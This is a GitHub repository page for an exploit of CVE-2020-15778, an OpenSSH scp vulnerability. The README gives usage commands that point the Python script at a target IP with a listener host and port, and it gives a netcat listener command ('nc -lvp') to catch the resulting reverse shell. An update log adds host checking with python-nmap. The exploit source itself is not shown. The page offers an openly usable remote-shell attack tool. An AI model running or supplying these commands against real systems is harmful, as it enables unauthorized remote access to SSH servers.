Skip to content

Neko-chanQwQ/CVE-2020-15778-Exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2020-15778-Exploit

Exploit for CVE-2020-15778(OpenSSH vul)

Example: python CVE-2020-15778.py -ip 192.168.11.123 -lhost 192.168.11.124 -lport 1234
You need to use netcat to listen port before use python script
Example: nc -lvp 1234
1.Screenshot of using script
Alt text
2.Screenshot of get shell
Alt text

2021-7-21 Update Log:
Use python-nmap to check host status
Usage:python3 CVE-2020-15778-Update.py -ip 192.168.11.123 -lhost 192.168.11.124 -lport 1234
"pip3 install python-nmap" before you use Update version script
XD

About

Exploit for CVE-2020-15778(OpenSSH vul)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages